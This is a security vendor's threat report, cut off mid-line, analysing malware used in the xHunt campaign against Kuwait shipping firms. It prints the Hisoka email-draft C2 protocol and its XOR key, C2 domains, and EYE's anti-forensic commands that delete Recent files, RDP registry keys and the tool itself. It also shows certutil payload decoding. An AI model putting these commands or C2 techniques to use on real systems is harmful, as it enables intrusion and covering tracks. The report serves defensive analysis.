{ "id": "558b4de8-6730-4aea-839b-2cea002f12dd", "created_at": "2026-04-06T00:09:37.439205Z", "updated_at": "2026-04-10T03:37:37.112279Z", "deleted_at": null, "sha1_hash": "8760851e40ff9b001aaa6128c13b4b1a7b5e52ba", "title": "xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1556325, "plain_text": "xHunt Campaign: Attacks on Kuwait Shipping and Transportation\r\nOrganizations\r\nBy Robert Falcone, Brittany Barbehenn\r\nPublished: 2019-09-23 · Archived: 2026-04-05 16:12:43 UTC\r\nExecutive Summary\r\nBetween May and June 2019, Unit 42 observed previously unknown tools used in the targeting of transportation and\r\nshipping organizations based in Kuwait.\r\nThe first known attack in this campaign targeted a Kuwait transportation and shipping company in which the actors installed\r\na backdoor tool named Hisoka. Several custom tools were later downloaded to the system in order to carry out post-exploitation activities. All of these tools appear to have been created by the same developer. We were able to collect several\r\nvariations of these tools including one dating back to July 2018.  \r\nThe developer of the collected tools used character names from the anime series Hunter x Hunter, which is the basis for the\r\ncampaign name “xHunt.” The names of the tools collected include backdoor tools Sakabota, Hisoka, Netero and Killua.\r\nThese tools not only use HTTP for their command and control (C2) channels, but certain variants of these tools use DNS\r\ntunneling or emails to communicate with their C2 as well. While DNS tunneling as a C2 channel is fairly common, the\r\nspecific method in which this group used email to facilitate C2 communications has not been observed by Unit 42 in quite\r\nsome time. This method uses Exchange Web Services (EWS) and stolen credentials to create email “drafts” to communicate\r\nbetween the actor and the tool. In addition to the aforementioned backdoor tools, we also observed tools referred to as Gon\r\nand EYE, which provide the backdoor access and the ability to carry out post-exploitation activities. \r\nThrough comparative analysis, we identified related activity also targeting Kuwait between July and December 2018, which\r\nwas recently reported by IBM X-Force IRIS. While there are no direct infrastructure overlaps between the two campaigns,\r\nhistorical analysis shows that the 2018 and 2019 activities are likely related. \r\nActivity Overview\r\nOn May 19, 2019, we observed a malicious binary named inetinfo.sys installed on a system at an organization within the\r\ntransportation and shipping sector of Kuwait. The file inetinfo.sys is a variant of a backdoor called Hisoka, specifically\r\nnoted as version 0.8 within the code. Unfortunately, we do not have telemetry on how the actor gained initial access to the\r\nsystem to install the Hisoka backdoor. \r\nWithin two hours of gaining access to the system through Hisoka, the actor deployed two additional tools named Gon and\r\nEYE, whose names were based on the filenames Gon.sys and EYE.exe. At a high level, the Gon tool allows the actor to scan\r\nfor open ports on remote systems, upload and download files, take screenshots, find other systems on the network, run\r\ncommands on remote systems and create a Remote Desktop Protocol  (RDP) session. The actor can use Gon as a command-line utility or by using a Graphical User Interface (GUI), as seen in Figure 1.\r\nhttps://unit42.paloaltonetworks.com/xhunt-campaign-attacks-on-kuwait-shipping-and-transportation-organizations/\r\nPage 1 of 22\n\nFigure 1. Gon’s GUI\r\nThe actor uses the EYE tool as a failsafe while they are logged into the system via RDP, as the tool will kill all processes\r\ncreated by the actor and remove other identifying artifacts if a legitimate user logs in. Please reference the Appendix for\r\nmore detailed information on Gon and EYE.\r\nBy hunting within our data set, we were able to identify a second Kuwait organization also in the transportation and shipping\r\nindustry targeted by the same threat group. Between June 18-30, 2019, threat actors installed the Hisoka tool. This time\r\nversion 0.9, which contained the filename netiso.sys. On June 18, this file was observed being transferred to another system\r\nvia the Server Message Block (SMB) protocol from an internal IT service desk account. Shortly after, a file named otc.dll\r\nwas seen transferred in the same manner. The otc.dll file is a tool named Killua that is a simple backdoor that allows an actor\r\nto issue commands from a C2 server to run on the infected system by communicating back and forth using DNS tunneling.\r\nBased on string comparisons, we believe with high confidence that the same developer created both the Killua and Hisoka\r\nhttps://unit42.paloaltonetworks.com/xhunt-campaign-attacks-on-kuwait-shipping-and-transportation-organizations/\r\nPage 2 of 22\n\ntools. We first observed Killua in June 2019 leading us to believe that Killua is a possible evolution of Hisoka. Details on the\r\nKillua tool are included in the Appendix. \r\nOn June 30, we observed related activity that was quite interesting, as the actor used a third-party help desk service account\r\nto copy the files to an additional system on the network. This activity began with the transfer of another Hisoka v0.9 file,\r\nfollowed by two different Killua files within a 30 minute timeframe.\r\nThe tools identified in the aforementioned activities appear to be created by the same developer, all of which are either\r\nnamed after characters from Hunter x Hunter or contain some other reference to the anime show.  \r\nHisoka Email-Based C2\r\nDuring our analysis, we identified two different versions of Hisoka, specifically v0.8 and v0.9, both installed onto the\r\nnetwork of two Kuwait organizations. Both versions contain command sets that allow the actor to control a compromised\r\nsystem. In both versions, the actor can communicate via a command and control (C2) channel that uses either HTTP or DNS\r\ntunneling. However, v0.9 also added the ability for an email-based C2 channel as well. A more detailed analysis of the two\r\nvariants can be found in the Appendix. \r\nThe email-based C2 communications capability added to Hisoka v0.9 relies on Exchange Web Services (EWS) to use a\r\nlegitimate account on an Exchange server in order to allow the actor to communicate with Hisoka. The malware attempts to\r\nlog into an Exchange server using supplied credentials and uses EWS to send and receive emails in order to establish\r\ncommunications between the target and the actor. However, the communications channel does not actually send and receive\r\nemails like other email-based C2 channels we have seen in the past. Instead, the channel relies on creating email drafts that\r\nthe Hisoka malware and the actor will process in order to exchange data back and forth. By using email drafts as well as the\r\nsame legitimate Exchange account to communicate, no emails will be detected outbound or received inbound. \r\nThe C2 channel leveraging EWS interacts with the mailbox of the legitimate account over an encrypted channel, as the\r\nrequests to the EWS application programming interface (API) uses HTTPS. To enable the email-based C2 channel, the actor\r\nwill provide -E EWS \u003cdata\u003e on the command line followed by data structured as follows: \r\n\u003cusername\u003e;\u003cpassword\u003e;\u003cdomain for Exchange server\u003e;\u003cExchange version (2010|2013)\u003e\r\nThe username and password must be a valid account on the Exchange server. We were able to test this functionality in our\r\nlab environment by creating an account named “hisoka” with the password “pass123!”. Using the -E EWS command and the\r\nfollowing string, we were able to enable the C2 channel: \r\nhisoka;pass123!;mail.contoso.com;2010\r\nTo initiate communications, Hisoka notifies the actor that it is ready to receive commands by creating an initial email draft\r\nthat is analogous to the beacon in other command and control channels. The initial email draft contains the subject “Present”\r\nwith an empty email body and an email address in the “To” field that has an identifier unique to the compromised system\r\n(“ABCDEF” in our testing) appended to “@contoso.com”. Figure 2 shows the initial draft email created by Hisoka viewed\r\nby logging into the account via Outlook Web App.\r\nhttps://unit42.paloaltonetworks.com/xhunt-campaign-attacks-on-kuwait-shipping-and-transportation-organizations/\r\nPage 3 of 22\n\nFigure 2. Hisoka v0.9 email draft used as a beacon\r\nTo issue commands, the actor will log into the same account and create a draft with the subject “Project” and a specially\r\ncrafted message body that contains the command as an encrypted string. We determined the structure of this message body\r\nby analyzing the code and found that the email must contain the string \u003cbody\u003e with a base64 encoded ciphertext on the\r\nfollowing line. While we have not seen the actor using this email channel for C2, we believe the email was sent as an HTML\r\nemail, as Hisoka will check that the email contains three lines after the \u003cbody\u003e tag. This is done by checking for three\r\ncarriage return characters (\\r), which we speculate is meant to include: one line for the ciphertext, one line for the closing\r\n\u003c/body\u003e tag and the last line for the closing \u003c/html\u003e tag. \r\nThe actor will encrypt the desired command by using the XOR operation on each character with the value 83 (0x53) and\r\nbase64 encoding the ciphertext. Figure 3 shows the email draft we created to test the C2 channel that issues the command C-get C:\\\\Windows\\\\Temp\\\\test.txt, which Hisoka will parse and treat as a command to upload the file at the path\r\nC:\\Windows\\Temp\\test.txt.\r\nFigure 3. Email draft used by Hisoka to obtain a command\r\nAfter parsing and running the commands obtained from the draft email containing the subject “Project”, Hisoka will create\r\nanother email draft to send the results of the command to the actor. This email draft will again have “Present” as its subject\r\nwith the same email address constructed with the system’s unique identifier and “@contoso.com” in the “To” field. The\r\nmessage body of the email draft is base64 encoded ciphertext that contains the response or result of the command and uses\r\nthe same XOR cipher with 83 (0x53) as the key used to encrypt the data. In the case of the file upload command, Hisoka\r\nwill attach a file of interest to the email draft as well. Figure 4 shows the email draft created by Hisoka after receiving the\r\nfile upload command noted in Figure 3 above. The email draft has the file test.txt attached and the decoded and decrypted\r\nmessage body is the string [!] C:\\\\Windows\\\\Temp\\\\test.txt Attached.\\r\\n\\t\\t\\t\\t\\t\\t{ Hisoka}.\r\nFigure 4. Hisoka v0.9 email draft used to respond to the upload file command\r\nWhile this is not the first email-based C2 channel we have seen in threat activities, the use of saved drafts and a legitimate\r\nExchange account shared between the malware and the actor is rather uncommon and has not been observed in quite some\r\ntime. \r\nOverlaps in Toolset\r\nhttps://unit42.paloaltonetworks.com/xhunt-campaign-attacks-on-kuwait-shipping-and-transportation-organizations/\r\nPage 4 of 22\n\nDuring our analysis of the malware activities occurring at the Kuwait organizations, we began seeing a trend in string\r\nobservables between Hisoka and other tools identified in this activity. These strings led us to identify a separate tool referred\r\nto as Sakabota by its author with the earliest sample identified around July 2018. \r\nWe analyzed dozens of samples during this analysis, which resulted in the identification of two separate campaigns -- one in\r\nmid-to-late 2018 using Sakabota and the other in mid-2019 using Hisoka. Our analysis of the two campaigns revealed that\r\nSakabota is the predecessor to Hisoka, which was first observed in May 2019. By analyzing both Hisoka and Sakabota as\r\nwell as the additional tools identified in the aforementioned activity, we have determined that Sakabota is likely the basis for\r\nthe development of all the tools used in these attack campaigns. \r\nThe Hisoka backdoor tool shares a significant amount of code from Sakabota, which is what leads us to believe that Hisoka\r\nevolved from Sakabota’s codebase. The number of functions and variable names are exactly the same in both Sakabota and\r\nHisoka suggest, which infers that the same developer created both and spent little effort trying to hide this lineage. The\r\nfollowing screenshot depicts a code comparison for Hisoka and Sakabota showing several variable name overlaps\r\n(“Chenged_Host”, “Host_Port”, etc) as well as the same general flow by which both tools determine if they should use the\r\nhardcoded C2 domain name or one provided as an argument on the command line. \r\nFigure 5. Sakabota \u0026 Hisoka comparison\r\nWe also observed shared code between Sakabota and the other tools used in the 2019 campaign. For instance, the\r\nSelf_Distruct method in EYE matches the Self_Distruct method in several Sakabota samples, and both tools print the highly\r\nunique string we be wait for you boss !!! to the window. Figure 6 below shows this specific overlap in the Self_Distruct\r\nmethods seen between EYE and Sakabota.\r\nFigure 6. EYE and Sakabota comparison \r\nIn addition to those code overlaps, the string “Sakabota” was also observed numerous times within Hisoka and the post-exploitation tools Gon and EYE observed in the 2019 Kuwait activity. First, Hisoka will display usage instructions if\r\nsupplied with the appropriate command-line argument, as seen in Figure 7. The usage instructions contain a changelog at the\r\nbottom that includes the string Compatible with Sakabota v3.2 that suggests a linkage between Hisoka and Sakabota.\r\nThroughout our analysis of all Hisoka samples collected, we observed usage instructions containing references up to\r\nSakabota v3.4.\r\nhttps://unit42.paloaltonetworks.com/xhunt-campaign-attacks-on-kuwait-shipping-and-transportation-organizations/\r\nPage 5 of 22\n\n********************************************\r\n*   ****** Ravolation Hisoka ********      *\r\n*   - General \u0026 AI Improvment              *\r\n*   - DNS A improvment \u0026 HTTP Engine       *\r\n*   - add HTTP Send                        *\r\n*   - Compatible with Sakabota v3.2        *\r\n********************************************\r\nFigure 7. Hisoka usage instructions containing suggested compatibility with Sakabota \r\nThe Gon post-exploitation tool from the 2019 campaign also contains the “Sakabota” string that it uses within the output log\r\nof its scanning. Gon’s scanning functionality will write discovered systems to a file at the path \u003cworking\r\ndirectory\u003e\\wnix\\Scan_Result.txt. When finished scanning, Gon will write a footer that contains the string\r\nSakabota_v0.2.0.0, which suggests it is also related to the Sakabota tool. Figure 8 is an example of the output that Gon will\r\nwrite to the file Scan_Result.txt after successfully finding another system during its scanning activities.\r\n172.16.107[.]140[WIN-\u003credacted\u003e] --\u003e SMB\r\n**************Sakabota_v0.2.0.0*****2019-06-14|#|13:32**************\r\nFigure 8. Example output provided from the Gon post-exploitation tool\r\nThe Sakabota string also appears in the debug paths within EYE and Gon. As you can see from the following debug path,\r\nthe EYE tool was compiled in a folder called “Sakabota_Tools”:\r\nZ:\\TOOLS\\Sakabota_Tools\\Utility\\Micosoft_Visual_Studio_2010_Experss\\PRJT\\Sync\\Sakabota\\EYE\\EYE\\obj\\Release\\EYE.pdb\r\nThe following debug path within Gon suggests that it was created on a system using the username “sakabota\", which further\r\nsuggests a relationship between the tools:\r\nC:\\Users\\sakabota\\Desktop\\Gon\\Gon\\obj\\Debug\\Gon.pdb\r\nFinally, we also observed the same legitimate applications plink and dsquery embedded within both Gon and Sakabota,\r\nwhich are used to port forward RDP sessions and to gather information from active directory. \r\nWhile there are overlaps in the malware used in both the 2018 and 2019 campaigns, it is unclear whether or not these two\r\ncampaigns were conducted by the same set of operators, only that there is some relationship at the malware development\r\nlevel. \r\nConnection to 2018 Campaign\r\nAfter identifying a relationship between Hisoka and Sakabota, we conducted a search and found several Sakabota samples --\r\nall of which were configured to use the domain pasta58[.]com for its C2 server. During general infrastructure analysis, this\r\ndomain was seen in overlapping infrastructure previously observed in attacks on organizations in Kuwait between April and\r\nhttps://unit42.paloaltonetworks.com/xhunt-campaign-attacks-on-kuwait-shipping-and-transportation-organizations/\r\nPage 6 of 22\n\nNovember 2018. Additional related activity was observed in July 2018, which involved spear-phishing emails that delivered\r\nmacro-enabled documents to install PowerShell-based payloads. We do not have additional telemetry on these attacks at this\r\ntime. \r\nThe following domains were identified in relation to pasta58[.]com:\r\nDomain Date Registered Registrant\r\nfirewallsupports[.]com 5/6/2018 - 5/6/2019 Masked\r\nwinx64-microsoft[.]com 7/15/18 - 7/15/19 Masked\r\n6google[.]com 7/31/18 - 7/31/19 Masked\r\nalforatsystem[.]com 5/29/18 - 5/29/19 Masked\r\nwindows64x[.]com 8/18/18 - 8/18/19 Masked\r\nwindows-updates[.]com 1/10/18 - 1/10/19 Masked\r\nmicrosoft-check[.]com 10/10/18 - 10/10/19 Masked\r\npasta58[.]com 12/27/17 - 12/27/18 Masked\r\ncheck-updates[.]com 6/24/18 - 6/24/19 Sofia Weber locas.l[@]yahoo.com\r\ntraveleasy-kw[.]com 6/13/18 - 6/13/19 Masked\r\nTable 1. Domains associated with Sakabota domain pasta58[.]com\r\nAccording to open-source information, the alforatsystem[.]com domain has hosted ZIP archives that contained LNK\r\nshortcut files to execute malicious PowerShell- and VBScript-based Trojans. One of the ZIP archives contained an\r\nexecutable file that beaconed to firewallsupports[.]com. The alforatsystem[.]com domain may be mirroring the Forat\r\nElectronic Systems Co. in Saudi Arabia, although we did not observe any additional Saudi Arabia targeting during our\r\nanalysis.\r\nWhile conducting general pivot analysis on available domain registration details, we also identified the domain\r\nsakabota[.]com whose web server served a page with the title “Outlook Web App” during the time of our analysis. While not\r\na direct overlap, this domain shares similar registrant details as the domain check-updates[.]com. It is of interest to note, this\r\ndomain was registered after the first observed Sakabota sample. \r\nDomain Date Registered Registrant\r\nsakabota[.]com 9/8/18 - 9/8/19 Sofi Weber sofiiiweber[@]keemail.me\r\nTable 2. Sakabota[.]com registration details\r\nLink Analysis\r\nIn several instances, historical infrastructure analysis shows potential overlaps between both Hisoka and Sakabota activities,\r\nas well as with OilRig ISMAgent campaigns and DNS Hijacking activity infrastructure. However, the infrastructure\r\noverlaps involve shared domain resolutions, but the timing of many of these resolutions are far enough apart to indicate a\r\nhttps://unit42.paloaltonetworks.com/xhunt-campaign-attacks-on-kuwait-shipping-and-transportation-organizations/\r\nPage 7 of 22\n\npotential change in actors using the infrastructure. This infrastructure overlap was also noted in a recent report by IBM X-Force IRIS. While not all inclusive, the following link analysis graph shows a snapshot of the infrastructure overlaps\r\nobserved:\r\nFigure 9. Infrastructure Link Analysis\r\nConclusion\r\nWhile there are similarities in the targeting of Kuwait organizations, domain naming structure and the underlying toolset\r\nused, it remains unclear at this time if the two campaigns (July to December 2018 and May to June 2019) were conducted by\r\nthe same set of operators. \r\nHistorical infrastructure analysis, as depicted in the link analysis chart (Figure 9), shows a close relationship between Hisoka\r\nand Sakabota infrastructure as well as with known OilRig infrastructure. \r\nDue to these overlaps and the focused targeting of organizations within the transportation and shipping industry in the\r\nMiddle East, we are tracking this activity very closely, and will continue analysis in order to determine a more solid\r\nconnection to known threat groups. \r\nPalo Alto Networks customers are protected by these threats through the following:\r\nCustomers using AutoFocus can view this activity by using the following tags:\r\nxHunt, Sakabota, Hisoka, Killua, Gon, EYE\r\nDNS Tunneling activity referenced in this blog is detected through DNS Security automated detection. \r\nAll tools identified are detected as malicious by WildFire and Traps. \r\nPalo Alto Networks has shared our findings, including file samples and indicators of compromise, in this report with our\r\nfellow Cyber Threat Alliance members. CTA members use this intelligence to rapidly deploy protections to their customers\r\nand to systematically disrupt malicious cyber actors. For more information on the Cyber Threat Alliance,\r\nvisit www.cyberthreatalliance.org.\r\nIndicators of Compromise\r\nhttps://unit42.paloaltonetworks.com/xhunt-campaign-attacks-on-kuwait-shipping-and-transportation-organizations/\r\nPage 8 of 22\n\nAll indicators associated with these activities can be found in our GitHub repository here.\r\nAppendix\r\nHisoka v0.8 Analysis\r\nBetween May 2019 and June 2019, we identified seven Hisoka v0.8 samples configured to beacon to the domains\r\nmicrosofte-update[.]com. Each of these samples also contain the following debug path:\r\nC:\\\\Users\\\\bob\\\\Desktop\\\\Hisoka\\\\Hisoka\\\\obj\\\\Debug\\\\inetinfo.sys.pdb\r\nThe file SHA256: 892d5e8e763073648dfebcfd4c89526989d909d6189826a974f17e2311de8bc4 was used in reference to the\r\nbelow analysis on Hisoka v0.8.\r\nHisoka is a backdoor malware that uses both HTTP and DNS tunneling for C2 communication. Communications are\r\nhardcoded into the file and the DNS channel looks for the below IP addresses when resolving the C2 domain: \r\npublic static string Replay_Keyword = \"245.10.10[.]11\";\r\npublic static string Itrupt_Keyword = \"244.10.10[.]10\";\r\npublic static string Instruction_Keyword = \"66.92.110[.]\";\r\nThe last octet in the third IP address above is used for Total_Package_Rows that tells Hisoka how many IP addresses to treat\r\nas data. \r\nIn order to obtain a command from the C2 channel, the malware will build a string structured as ID:\u003cuniq_ID\u003e-\u003e and send it\r\nwithin a POST request over HTTPS using the following hardcoded user-agent: \r\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103\r\nSafari/537.36\r\nIt then treats the C2’s response as a command by confirming that the first character of the string is a “C”. It then runs the\r\nremaining data as a command if it does not match one of the following listed arguments:\r\nhttps://unit42.paloaltonetworks.com/xhunt-campaign-attacks-on-kuwait-shipping-and-transportation-organizations/\r\nPage 9 of 22\n\nFigure 10. Hisoka v0.8 screenshot\r\nHisoka will use either DNS queries or HTTP requests to send data to the C2 server depending on which engine is currently\r\nset in its configuration or on the command line. If configured to use HTTP, Hisoka uses the same POST request over HTTPS\r\nas mentioned above with the unique identifier within the \"Accept-Language\" header of the request and the data to send\r\nwithin the POST data. \r\nIf the C2 engine type is \"DNS\", it will use the nslookup application using DNS queries to resolve domains constructed as\r\nfollows:\r\n\u003cunique identifier\u003e\u003cencrypted base64 encoded data (24 bytes for \"A\" and 64 characters for \"TXT\" at a time\u003e.\u003cC2 location\u003e\r\nIn the samples we analyzed, a random value was not included in the subdomain, making it possible that two queries would\r\nhave the same subdomain and be resolved by a cached answer. Through deeper analysis of the malware itself, it appears the\r\ndeveloper did create a variable to store a random number in. However they forgot to include this value in the actual\r\nsubdomain itself.       \r\nHisoka v0.9 Analysis\r\nIn June 2019, we began seeing an updated variant of Hisoka (SHA256:\r\na78bfa251a01bf6f93b4b52b2ef0679e7f4cc8ac770bcc4fef5bb229e2e888b) used against these same organizations. We\r\nhttps://unit42.paloaltonetworks.com/xhunt-campaign-attacks-on-kuwait-shipping-and-transportation-organizations/\r\nPage 10 of 22\n\nidentified four samples of this variant that were configured to beacon to the domains google-update[.]com or learn-service[.]com.\r\nWithin this version, the developer removed some functionality from within Hisoka and created a new tool named “Netero”,\r\nwhich includes the removed functionality. Netero is embedded in the Hisoka tool within a resource named msdtd and is\r\nsaved to the system in the event that Hisoka needs to use that functionality. The process of moving the functionality out of\r\nHisoka into another tool suggests the author was seeking a more modular architecture in an attempt to evade detection. The\r\npayload is base64 encoded and exists as a certificate, which Hisoka v0.9 uses certutil.exe -decode \u003ccwd\u003e\\msdtd.txt\r\n\u003ccwd\u003e\\msdtd.sys on the base64 encoded payload.\r\nIn addition to moving the functionality into Netero, Hisoka v0.9 added an email-based C2 communications capability that\r\nsupplements the DNS and HTTPS C2 channels observed in the Hisoka v0.8 samples. It attempts to log into an Exchange\r\nserver using supplied credentials and uses EWS in order to establish communications between the target and the actor.\r\nThe actor must supply the settings via the command line (-E EWS \u003cdata\u003e) structured as follows:\r\n\u003cdomain\\username\u003e;\u003cpassword\u003e;\u003cdomain for Exchange server\u003e;\u003cExchange version (2010|2013)\u003e\r\nIf the actor does not provide a string formatted as above, the following hardcoded data will be used. We believe the below\r\nsample data is a leftover artifact from the developer's testing of this capability:\r\nshadow\\\\boss;P@ssw0rd;cas;2013\r\nWhat this shows is that the default values will use the username \"shadow\\boss\" with the password \"P@ssw0rd\" and attempt\r\nto access the following URL:\r\nhttps://cas/EWS/Exchange.asmx\r\nHisoka will then attempt to log into the Exchange Server using the supplied credentials and check for emails that Hisoka\r\nwill then process and use for inbound communications by the actor. In order to receive inbound communications, EWS is\r\nused to grab messages within the “Drafts” folder (three in the WellKnownFolderName Enum) containing an email thread\r\nnamed “Project”.\r\nFor outbound communications, Hisoka will create an email with the subject “Present”. It will include an encrypted message\r\nin the body of the email and a file will be attached to the email if the C2 issues the ‘file upload’ command. The following\r\nemail address is placed in the “To” field:\r\n\u003cunique identifier\u003e@contoso.com\r\nHisoka does not send the email and instead saves the email in the “Drafts” folder. Using the “Drafts” folder suggests that the\r\nactor could log into the same user account to verify that the email exists and can therefore further validate the ability to\r\nreceive communications from Hisoka. It is also likely that the actor would use the unique identifier in the “To” field to\r\ndetermine which compromised system sent the data via the email C2 channel. \r\nThe observed Hisoka v0.9 samples were configured to beacon to the domain learn-service[.]com and contained the\r\nfollowing arguments: \r\nhttps://unit42.paloaltonetworks.com/xhunt-campaign-attacks-on-kuwait-shipping-and-transportation-organizations/\r\nPage 11 of 22\n\nFigure 11. Hisoka v0.9 screenshot\r\nThe usage details at the bottom of the screenshot suggest that the developer has added a “bypass” to Palo Alto Networks\r\nTraps. This indicates that the developer has some level of awareness of the security mechanisms their intended targets are\r\ncurrently deploying.\r\nEYE\r\nEYE is a post-exploitation tool first observed in May 2019. However, it contains a Windows Portable Executable (PE)\r\ncompile time of January 21, 2019. The purpose of this tool is to evade detection by allowing the actor to cover up their\r\nactivities while they are logged into the compromised system in the event that a legitimate user attempts to log in to the\r\nsystem. Unlike Hisoka, which monitors for local logins and RDP sessions and subsequently logs them to the registry for\r\nlater exfiltration, EYE monitors for these logins to kill the processes and delete registry keys and files created during the\r\nactor’s session.\r\nWhen the user runs the EYE application, it requires the user to enter a \"y\" for yes or \"n\" for no in a setting called \"Log off\r\nmode\". \r\nChoose -\u003e Log off Mode  ? :\r\n[y]\r\n[n]\r\nRegardless of the user's input, EYE will start monitoring for inbound login attempts initiated locally or by remote RDP\r\nsessions. It will first display the version number \"v0.1\" followed by ASCII art of an unknown picture. Immediately\r\nfollowing the ASCII art display, the tool will write messages to the console indicating that it is starting to watch for inbound\r\nlogin attempts followed by a list of processes created since the actor executed the EYE tool. Figure 12 shows the output of\r\nthe EYE tool from our testing, which shows several processes created (calc, SnippingTool, etc.) while EYE was running\r\nuntil a local login attempt occurred.\r\nhttps://unit42.paloaltonetworks.com/xhunt-campaign-attacks-on-kuwait-shipping-and-transportation-organizations/\r\nPage 12 of 22\n\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n                                      v0.1\r\n                                 ??\r\n                               ? ?\r\n                               ??? ?\r\n                               ?????      ?\r\n                                 ????? ? ???     ?\r\n                                  ????? ???? ?  ??\r\n                                  ?????? ??? ????\r\n                               ? ?????????? ????  ?\r\n                              ??????????????????????\r\n                              ????????????????????\r\n                              ?????????????????? ?\r\n                           ????????????????????????\r\n                       ???   ????????????????????? ???                    ??\r\n                   ???         ??????????????????      ???                ??\r\n                ??               ??????????                ??            ??\r\n              ??                ???????????                  ??          ??\r\n            ?                   ???     ????                    ?       ??\r\n          ??                    ????? ?????                      ??    ???\r\n         ?                       ???    ???                        ?   ??\r\n        ?                       ? ????????                         ??????\r\n       ?                  ??????? ???????? ?????                   ????????\r\n      ?               ?????????? ????????? ???? ????               ????\r\n     ?               ?????????? ??????????? ??????????           ???????\r\n                   ???????????? ??????????? ???????????         ????????\r\n    ?              ???????????  ??????????? ????????????????? ???????????\r\n                   ???????????? ??????????? ????????? ???? ?     ??????\r\n                  ????????????? ??????????? ????????? ??? ???    ????\r\nhttps://unit42.paloaltonetworks.com/xhunt-campaign-attacks-on-kuwait-shipping-and-transportation-organizations/\r\nPage 13 of 22\n\n29\r\n30\r\n31\r\n32\r\n33\r\n34\r\n35\r\n36\r\n37\r\n38\r\n39\r\n40\r\n41\r\n42\r\n43\r\n44\r\n45\r\n46\r\n47\r\n48\r\n49\r\n50\r\n51\r\n52\r\n53\r\n54\r\n55\r\n56\r\n57\r\n                  ?????????????? ????????? ?????????  ??? ??  ??????\r\n    ?             ??????????????? ??????? ????????????????? ????????    ?\r\n    ?            ??????????????????  ?  ????????????????????????????    ?\r\n                ??????????????????????????????????????? ?? ??? ?????   ?\r\n                ??????????????????????????????????????  ?????? ?? ??   ?\r\n      ?       ??????????????????????????????????? ??????????? ??      ?\r\n       ?     ?????????????????????????????????????????????   ??      ?\r\n        ?     ???????? ??????????????????????    ????????   ??      ?\r\n          ?   ?????   ???????? ????? ???  ??       ?????   ??     ?\r\n           ?? ??????    ????   ?? ??? ???         ??????????     ?\r\n            ???????????            ?    ?        ??????????   ??\r\n           ?????????????????????    ?          ???????????????\r\n          ???????????????????????? ???         ??????????????\r\n          ????????????????????????????  ??????????????????????\r\n           ???????????????????????????????????????????????????\r\n            ????????????????????? ????????????????????????????\r\n              ????????????????              ?????????????????\r\n                                                    ??\r\nStart Watching Without LOG_OFF Mode...\r\niexplore\u003c3408\u003e\r\niexplore\u003c2088\u003e\r\ncmd\u003c2280\u003e\r\nconhost\u003c1056\u003e\r\ncalc\u003c3664\u003e\r\nSnippingTool\u003c3024\u003e\r\nwisptis\u003c768\u003e\r\nSoundRecorder\u003c2996\u003e\r\ncontrol\u003c1292\u003e\r\nrundll32\u003c2436\u003e\r\nhttps://unit42.paloaltonetworks.com/xhunt-campaign-attacks-on-kuwait-shipping-and-transportation-organizations/\r\nPage 14 of 22\n\n58\r\n59\r\n60\r\n61\r\n62\r\n63\r\n64\r\n65\r\n66\r\n67\r\n68\r\n69\r\ndllhost\u003c3996\u003e\r\ndllhost\u003c1096\u003e\r\nTSTheme\u003c3900\u003e\r\ncmd\u003c1884\u003e\r\nwe be wait for you boss !!!\r\nTPAutoConnect\u003c2912\u003e\r\nconhost\u003c2376\u003e\r\ncmd\u003c1200\u003e\r\nconhost\u003c2536\u003e\r\ntaskkill\u003c3336\u003e\r\nFigure 12. EYE Process names and IDs seen during the actors session prior to inbound login attempts\r\nWhen the local or RDP login attempt occurs, EYE will write the unique string “we be wait for you boss !!!” to the console\r\nbefore starting to clean up the actor’s tracks. To clean up, EYE will terminate all processes created since the actor started the\r\nEYE tool, which effectively closes all applications and tools created by the actor. EYE will then delete all recent documents\r\nand files created from jump list usage by running the following command:\r\nDel /F /Q %APPDATA%\\\\Microsoft\\\\Windows\\\\Recent\\\\* \u0026 Del /F /Q\r\n%APPDATA%\\\\Microsoft\\\\Windows\\\\Recent\\\\AutomaticDestinations\\\\* \u0026 Del /F /Q\r\n%APPDATA%\\\\Microsoft\\\\Windows\\\\Recent\\\\CustomDestinations\\\\*\r\nEYE will also delete all values found in the following registry keys and the ‘Default.rdp’ file in the user’s folder to cover up\r\nthe actor’s activity on the system and any RDP sessions opened from the system:\r\nSoftware\\\\Microsoft\\\\Terminal Server Client\\\\Default\r\nSOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\WordWheelQuery\r\nSOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TYPEDPATHS\r\nSoftware\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\RunMRU\r\nEYE will finish by attempting to delete itself from the system by running the following command:\r\ntaskkill /f /im \u003cEYE’s executable filename\u003e \u0026 choice /C Y /N /D Y /T 3 \u0026 Del \"\u003cpath to EYE’s executable\u003e\"\r\nEYE does contain some interesting artifacts such as the presence of the 'ExecuteCommand' method that is never used or\r\ncalled. The presence of this method suggests it is either leftover code from a previous version or an artifact from another\r\ncodebase that this tool is based on. We believe EYE was created using the code of Hisoka and Sakabota, as there are\r\nsignificant overlaps in method and variable names, as well as a reference to Sakabota in the PDB debug path:\r\nhttps://unit42.paloaltonetworks.com/xhunt-campaign-attacks-on-kuwait-shipping-and-transportation-organizations/\r\nPage 15 of 22\n\nZ:\\TOOLS\\Sakabota_Tools\\Utility\\Micosoft_Visual_Studio_2010_Experss\\PRJT\\Sync\\Sakabota\\EYE\\EYE\\obj\\Release\\EYE.pdb\r\nGon\r\nThe Gon tool was also first observed in May 2019 and contains a variety of functionality. The majority of this functionality\r\nindicates that it would likely be used as a post-exploitation tool to help an actor carry out activities after gaining access to a\r\nsystem. \r\nGon provides an actor with the ability to scan for open ports on remote systems, upload and download files, take\r\nscreenshots, find other systems on the network, run commands on remote systems using WMI or PSEXEC and create an\r\nRDP session using the plink utility. Gon can be used as a command-line utility or as a desktop application using the\r\nprovided GUI. Using the GUI, Gon can use the “dsquery” tool embedded within it to issue the following commands to\r\nobtain computer, user and group names from an active directory:\r\nDS.exe computer -limit 0 \u003e computer_DS.txt\r\nDS.exe user -limit 0 \u003e 